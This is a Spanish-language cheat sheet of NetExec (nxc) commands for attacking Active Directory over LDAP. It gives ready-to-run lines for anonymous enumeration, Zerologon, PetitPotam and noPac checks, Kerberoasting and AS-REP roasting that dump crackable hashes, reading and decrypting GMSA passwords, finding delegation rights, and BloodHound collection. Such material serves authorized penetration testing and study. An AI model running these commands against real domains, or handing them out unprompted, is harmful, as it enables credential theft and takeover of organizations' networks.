LDAP (389)

  • nxc ldap se usa para interactuar con un servidor LDAP.
  • Las diferentes opciones -u, -p, y -M especifican el usuario, contraseña y módulo de acción, respectivamente.
  • El uso de diferentes módulos (-M) permite realizar tareas como enumeración de usuarios, verificación de vulnerabilidades como Zerologon o PetitPotam, y kerberoasting, entre otras.
  • Las opciones adicionales como –gmsa o –trusted-for-delegation permiten obtener detalles específicos de la configuración de los usuarios y cuentas del dominio.
# Realizar un escaneo LDAP en el objetivo con el parámetro -user-desc
nxc ldap <target> -u '' -p '' -M -user-desc

# Obtener descripciones de los usuarios en el dominio
nxc ldap <target> -u '' -p '' -M get-desc-users

# Ejecutar un verificador de LDAP para comprobar configuraciones del servidor
nxc ldap <target> -u '' -p '' -M ldap-checker

# Comprobar configuración relacionada con Veeam (Backup/Restauración)
nxc ldap <target> -u '' -p '' -M veeam

# Realizar un escaneo relacionado con 'maq' (probablemente algún tipo de auditoría)
nxc ldap <target> -u '' -p '' -M maq

# Ejecutar pruebas para comprobar configuraciones de ADCS (Active Directory Certificate Services)
nxc ldap <target> -u '' -p '' -M adcs

# Comprobar vulnerabilidad Zerologon (CVE-2020-1472)
nxc ldap <target> -u '' -p '' -M zerologon

# Comprobar vulnerabilidad PetitPotam (CVE-2021-36942)
nxc ldap <target> -u '' -p '' -M petitpotam

# Verificar si hay contraseñas con flag NO PAC (no hace parte del protocolo)
nxc ldap <target> -u '' -p '' -M nopac

# Ejecutar el comando whoami con caché de Kerberos
nxc ldap <target> -u '' -p '' --use-kcache -M whoami

# Enumerar usuarios de dominio habilitados
nxc ldap <target> -u '<username>' -p '<password>' --users

# Enumerar los grupos de dominio del servidor LDAP
nxc ldap <target> -u '<username>' -p '<password>' --groups

# Realizar Kerberoasting y guardar los hashes en el archivo hashes.kerberoasting
nxc ldap <target> -u '<username>' -p '<password>' --kerberoasting hashes.kerberoasting

# Realizar AS-REP Roasting y guardar los hashes en el archivo hashes.asreproast
nxc ldap <target> -u '<username>' -p '<password>' --asreproast hashes.asreproast

# Obtener usuarios con el flag PASSWD_NOTREQD (sin requerir contraseña)
nxc ldap <target> -u '<username>' -p '<password>' --password-not-required

# Obtener usuarios y computadoras con el flag Trusted_for_delegation
nxc ldap <target> -u '<username>' -p '<password>' --trusted-for-delegation

# Buscar objetos con el valor de admisión (admin count) igual a 1
nxc ldap <target> -u '<username>' -p '<password>' --admin-count

# Obtener el SID (Security Identifier) del dominio
nxc ldap <target> -u '<username>' -p '<password>' --get-sid

# Enumerar contraseñas de GMSA (Group Managed Service Accounts)
nxc ldap <target> -u '<username>' -p '<password>' --gmsa

# Enumerar contraseñas de GMSA con clave (key) adicional
nxc ldap <target> -u '<username>' -p '<password>' --gmsa -k

# Convertir un ID específico de GMSA
nxc ldap <target> -u '<username>' -p '<password>' --gmsa-convert-id <ID>

# Desencriptar una cuenta GMSA en LSA (Local Security Authority)
nxc ldap <target> -u '<username>' -p '<password>' --gmsa-decrypt-lsa <ACCOUNT>

# Buscar delegaciones en el servidor LDAP
nxc ldap <target> -u '<username>' -p '<password>' --find-delegation

# Obtener información de red del dominio en todos los objetos
nxc ldap <target> -u '<username>' -p '<password>' -M get-network -o ALL=true

# Ejecutar un escaneo con BloodHound para enumerar relaciones y permisos de delegación
nxc ldap <target> -u '<username>' -p '<password>' --dns-server <dns-server ip> --bloodhound -c All

# Ejecutar un escaneo con BloodHound sobre servidor DNS específico, incluyendo la caché de Kerberos
nxc ldap <target> -u '<username>' --use-kcache --bloodhound --dns-tcp --dns-server <target> -c All